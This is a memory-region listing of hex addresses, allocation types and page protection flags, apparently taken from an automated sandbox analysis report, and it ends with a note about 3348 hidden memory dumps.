page read and write
90D8000
unkown
page read and write
9080000
trusted library allocation
page read and write
59E2000
trusted library allocation
page read and write
697F000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
5853000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9190000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
506467E000
stack
page read and write
9300000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8200000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1A55C9BE000
heap
page read and write
ABD5A7E000
stack
page read and write
584E000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9230000
trusted library allocation
page read and write
6170000
trusted library allocation
page read and write
9560000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
6C24000
direct allocation
page read and write
5595000
heap
page read and write
5B3D000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
1F8A6229000
heap
page read and write
9F50000
trusted library allocation
page read and write
5576000
heap
page read and write
9F60000
trusted library allocation
page read and write
75D0000
unkown
page read and write
9090000
unkown
page read and write
90C0000
trusted library allocation
page read and write
914F000
trusted library allocation
page read and write
1C15123F000
heap
page read and write
9120000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
598D000
trusted library allocation
page read and write
4D00000
trusted library allocation
page read and write
29D5D513000
heap
page read and write
1F8A6280000
heap
page read and write
75D0000
trusted library allocation
page read and write
6B72000
direct allocation
page read and write
6E16000
trusted library allocation
page read and write
1C151229000
heap
page read and write
2CD0000
remote allocation
page read and write
6DEB000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
7DFADFF000
stack
page read and write
9000000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
1C156AA1000
heap
page read and write
4EBF000
stack
page read and write
6E01000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
6CBF000
trusted library allocation
page read and write
9070000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
21DD6692000
heap
page read and write
4F2E000
stack
page read and write
75E0000
trusted library allocation
page read and write
8BAB000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
1A55C999000
heap
page read and write
5584000
heap
page read and write
4440000
trusted library allocation
page read and write
500E000
stack
page read and write
5B40000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
6E29000
trusted library allocation
page read and write
6E7D000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
9080000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
A77000
heap
page read and write
1A55C96D000
heap
page read and write
75D0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
483C000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
646B000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
5859000
trusted library allocation
page read and write
5839000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
5A7C000
trusted library allocation
page read and write
8F2F000
stack
page read and write
1A55C2C7000
heap
page read and write
8F30000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
2CE0000
remote allocation
page execute and read and write
82A0000
trusted library allocation
page read and write
6E9D000
trusted library allocation
page read and write
6D3A000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
7003000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
55C2000
heap
page read and write
94D0000
trusted library allocation
page read and write
9F83000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
75D5000
unkown
page read and write
9140000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
6DF8000
trusted library allocation
page read and write
1A55C285000
heap
page read and write
6DC3000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
9B4000
heap
page read and write
82A0000
trusted library allocation
page read and write
5063E7B000
stack
page read and write
7590000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
A7F000
stack
page read and write
94A2000
trusted library allocation
page read and write
1C156860000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
9540000
trusted library allocation
page read and write
282676E1000
heap
page read and write
75E0000
trusted library allocation
page read and write
3380000
stack
page read and write
9110000
trusted library allocation
page read and write
63EB000
trusted library allocation
page read and write
91BF000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
7FB0000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
5ADC000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
75D5000
trusted library allocation
page read and write
4AC0000
heap
page read and write
8EA0000
trusted library allocation
page read and write
4D4E000
heap
page read and write
90C0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
6C10000
direct allocation
page read and write
6E57000
trusted library allocation
page read and write
6DE8000
trusted library allocation
page read and write
7000000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
8FC0000
trusted library allocation
page read and write
29D5D479000
heap
page read and write
2D6B000
unkown
page read and write
9120000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
8EE000
stack
page read and write
150000
heap
page read and write
75D5000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
81F6000
unkown
page read and write
56E3000
trusted library allocation
page read and write
4C20000
direct allocation
page read and write
1C156874000
trusted library allocation
page read and write
28267460000
heap
page read and write
2CD0000
remote allocation
page read and write
59D6000
trusted library allocation
page read and write
4B5D000
heap
page read and write
9165000
trusted library allocation
page read and write
21CB2D08000
heap
page read and write
28267613000
heap
page read and write
2CD0000
remote allocation
page read and write
59C7000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9080000
trusted library allocation
page read and write
7FE9000
unkown
page read and write
BBA78FF000
stack
page read and write
1C1B0C10000
heap
page read and write
2CD0000
remote allocation
page read and write
1C27D313000
heap
page read and write
5598000
heap
page read and write
6E6A000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
5687000
trusted library allocation
page read and write
8290000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
4C5D000
trusted library allocation
page execute and read and write
2C40000
trusted library allocation
page read and write
530E000
stack
page read and write
90D0000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
8205000
trusted library allocation
page read and write
82A0000
unkown
page read and write
6E33000
trusted library allocation
page read and write
28267600000
heap
page read and write
9150000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
5A1D000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
CDD207E000
stack
page read and write
9F64000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
44AD000
stack
page read and write
88C000
stack
page read and write
7510000
direct allocation
page read and write
2DDA000
heap
page read and write
4BA0000
direct allocation
page read and write
9140000
trusted library allocation
page read and write
9530000
unkown
page read and write
4E10000
trusted library allocation
page read and write
8B5F000
stack
page read and write
81F0000
unkown
page read and write
2CD0000
remote allocation
page read and write
4AFF000
heap
page read and write
9140000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
21CB2C02000
heap
page read and write
4AFB000
heap
page read and write
5DB8000
trusted library allocation
page read and write
5D63000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
4B6E000
heap
page read and write
8F30000
trusted library allocation
page read and write
58F1000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
506417A000
stack
page read and write
457E000
stack
page read and write
9250000
trusted library allocation
page read and write
2F12000
heap
page read and write
2CD0000
remote allocation
page read and write
5F67000
trusted library allocation
page read and write
82A8000
trusted library allocation
page read and write
1019000
heap
page read and write
9125000
trusted library allocation
page read and write
5B40000
trusted library allocation
page read and write
5CDF000
stack
page read and write
9F40000
trusted library allocation
page read and write
1C156850000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
9090000
unkown
page read and write
9092000
trusted library allocation
page read and write
4E00000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
6B90000
direct allocation
page read and write
5105000
trusted library allocation
page read and write
83EB5CB000
stack
page read and write
8205000
trusted library allocation
page read and write
6608000
trusted library allocation
page read and write
FF1000
heap
page read and write
90E0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
1C27D300000
heap
page read and write
9470000
trusted library allocation
page read and write
1A55CE3E000
heap
page read and write
D0B000
heap
page read and write
8200000
trusted library allocation
page read and write
7550000
direct allocation
page read and write
9230000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
6E93000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
540F000
stack
page read and write
6E8B000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9120000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
9D8F000
unkown
page read and write
F15967E000
stack
page read and write
1C156950000
trusted library allocation
page read and write
8250000
unkown
page read and write
9190000
trusted library allocation
page read and write
1A55C982000
heap
page read and write
9550000
trusted library allocation
page read and write
6DCC000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
5063EFF000
stack
page read and write
4B80000
direct allocation
page read and write
6DFB000
trusted library allocation
page read and write
7FD0000
unkown
page read and write
90C0000
trusted library allocation
page read and write
55AB000
heap
page read and write
55B4000
heap
page read and write
482A000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
4940000
heap
page read and write
589A000
trusted library allocation
page read and write
4E9E000
unkown
page read and write
808000
heap
page read and write
2E3B000
heap
page read and write
556C000
stack
page read and write
62DB000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
1A55C97E000
heap
page read and write
44D0000
remote allocation
page read and write
8A2C000
direct allocation
page read and write
7320000
trusted library allocation
page read and write
6E87000
trusted library allocation
page read and write
504FEFB000
stack
page read and write
50500FE000
stack
page read and write
2D68000
heap
page read and write
9090000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
6E5A000
trusted library allocation
page read and write
21DD667D000
heap
page read and write
94A0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
9060000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
8F80000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
59B6000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
5B40000
trusted library allocation
page read and write
1C151B02000
heap
page read and write
8EA0000
trusted library allocation
page read and write
A010000
trusted library allocation
page read and write
9F40000
trusted library allocation
page read and write
8BD4000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
81F0000
unkown
page read and write
2CE0000
remote allocation
page execute and read and write
9240000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
75F5000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
8101000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
750000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
4D68000
heap
page read and write
820C000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
570000
heap
page read and write
2CD0000
remote allocation
page read and write
5A14000
trusted library allocation
page read and write
1C15128C000
heap
page read and write
9543000
trusted library allocation
page read and write
6DFA000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
5840000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
1C151B18000
heap
page read and write
29D5D480000
heap
page read and write
7FA0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9160000
trusted library allocation
page read and write
8207000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
9120000
trusted library allocation
page read and write
4FD0000
heap
page read and write
1C1566A0000
trusted library allocation
page read and write
2D611413000
heap
page read and write
480F000
unkown
page read and write
51E0000
heap
page read and write
9255000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
504FAF9000
stack
page read and write
5CBA000
trusted library allocation
page read and write
4D85000
heap
page read and write
8F20000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
5108000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
21DD6686000
heap
page read and write
80FF000
trusted library allocation
page read and write
4E10000
trusted library allocation
page read and write
9495000
trusted library allocation
page read and write
6E86000
trusted library allocation
page read and write
ABD54FE000
stack
page read and write
9160000
trusted library allocation
page read and write
9F60000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
21CB2C00000
heap
page read and write
5D3A000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2DA7000
stack
page read and write
4EFE000
stack
page read and write
5830000
trusted library allocation
page read and write
8F3A000
trusted library allocation
page read and write
A6A000
heap
page read and write
1C151940000
trusted library section
page read and write
6C2F000
direct allocation
page read and write
90E0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
7FE0000
unkown
page read and write
4FB0000
trusted library allocation
page read and write
2C47000
trusted library allocation
page read and write
1C1B0E02000
heap
page read and write
90D0000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
A46000
heap
page read and write
6B80000
trusted library allocation
page read and write
9210000
trusted library allocation
page read and write
9FC0000
trusted library allocation
page read and write
9208000
trusted library allocation
page read and write
8F50000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
5A9E000
trusted library allocation
page read and write
9B0D6FF000
stack
page read and write
8F70000
trusted library allocation
page read and write
1C156970000
trusted library allocation
page read and write
559D000
heap
page read and write
9125000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
7070000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
59E2000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
935F000
trusted library allocation
page read and write
6DEE000
trusted library allocation
page read and write
1C27D289000
heap
page read and write
82A0000
trusted library allocation
page read and write
4886000
trusted library allocation
page read and write
4E70000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
1A55C98B000
heap
page read and write
663F000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
6DEA000
trusted library allocation
page read and write
4560000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
2C40000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
1C156AA9000
heap
page read and write
9F40000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
9122000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
44D0000
remote allocation
page read and write
6E3A000
trusted library allocation
page read and write
1C27D25E000
heap
page read and write
4830000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
59E2000
trusted library allocation
page read and write
4B38000
heap
page read and write
6DF7000
trusted library allocation
page read and write
8270000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
1C27D200000
heap
page read and write
5064279000
stack
page read and write
8200000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
5CC0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2E85000
heap
page read and write
8EA0000
trusted library allocation
page read and write
310000
heap
page read and write
8205000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
80E3000
trusted library allocation
page read and write
9F50000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
6E13000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
F86000
heap
page read and write
7FE0000
unkown
page read and write
2DB0000
heap
page read and write
75D0000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
4B44000
heap
page read and write
9F50000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
29D5DC02000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
55AB000
heap
page read and write
6E0E000
trusted library allocation
page read and write
29D5D468000
heap
page read and write
29D5D402000
heap
page read and write
9090000
trusted library allocation
page read and write
1CD000
stack
page read and write
59D2000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
9050000
trusted library allocation
page read and write
4D87000
heap
page read and write
9FC0000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
7FE0000
trusted library allocation
page read and write
586C000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
21CB2B40000
heap
page read and write
7FE0000
trusted library allocation
page read and write
92B0000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
91A2000
trusted library allocation
page read and write
4FFF000
stack
page read and write
2CD0000
remote allocation
page read and write
9462000
trusted library allocation
page read and write
4D6F000
stack
page read and write
8205000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
94E0000
trusted library allocation
page read and write
5706000
trusted library allocation
page read and write
82A0000
trusted library allocation
page read and write
6E1E000
trusted library allocation
page read and write
4550000
heap
page read and write
5556000
heap
page read and write
81F5000
unkown
page read and write
7590000
direct allocation
page read and write
49E3000
heap
page read and write
8205000
trusted library allocation
page read and write
5112000
trusted library allocation
page read and write
2D611402000
heap
page read and write
6E46000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
2C00000
trusted library section
page read and write
3A0000
remote allocation
page read and write
9090000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
6456000
trusted library allocation
page read and write
49F9000
stack
page read and write
9090000
trusted library allocation
page read and write
6FF0000
trusted library allocation
page read and write
74B0000
direct allocation
page read and write
8F30000
trusted library allocation
page read and write
7FEF000
trusted library allocation
page read and write
1A55C919000
heap
page read and write
4FFF000
stack
page read and write
6FE0000
trusted library allocation
page read and write
6740000
trusted library allocation
page read and write
1A55C97A000
heap
page read and write
91A0000
trusted library allocation
page read and write
970000
heap
page read and write
7AE000
stack
page read and write
1C156B04000
heap
page read and write
4D41000
heap
page read and write
90D0000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
1A55C97C000
heap
page read and write
370E000
heap
page read and write
6E76000
trusted library allocation
page read and write
7DFAEFC000
stack
page read and write
9F50000
trusted library allocation
page read and write
8200000
unkown
page read and write
83EC1FF000
stack
page read and write
94A9000
trusted library allocation
page read and write
6AFF000
trusted library allocation
page read and write
8AF000
stack
page read and write
9120000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
6DDC000
trusted library allocation
page read and write
4D87000
heap
page read and write
9FA0000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
90D0000
trusted library allocation
page read and write
5984000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
6569000
trusted library allocation
page read and write
282676BC000
heap
page read and write
9190000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
1A55C28A000
heap
page read and write
7FE0000
unkown
page read and write
8220000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
2CD0000
remote allocation
page read and write
8200000
trusted library allocation
page read and write
9124000
trusted library allocation
page read and write
21DD6694000
heap
page read and write
6E11000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
2CE0000
remote allocation
page execute and read and write
5BB0000
trusted library allocation
page read and write
8E6E000
stack
page read and write
7220000
trusted library allocation
page read and write
4D1E000
unkown
page read and write
5A3C000
trusted library allocation
page read and write
1F8A6180000
heap
page read and write
7010000
trusted library allocation
page read and write
4EFE000
stack
page read and write
9100000
trusted library allocation
page read and write
28267644000
heap
page read and write
91A5000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9FA0000
trusted library allocation
page read and write
1A55C97F000
heap
page read and write
9320000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
1A55C985000
heap
page read and write
7250000
trusted library allocation
page read and write
2C20000
trusted library allocation
page read and write
5595000
heap
page read and write
There are 3348 hidden memdumps, click here to show them.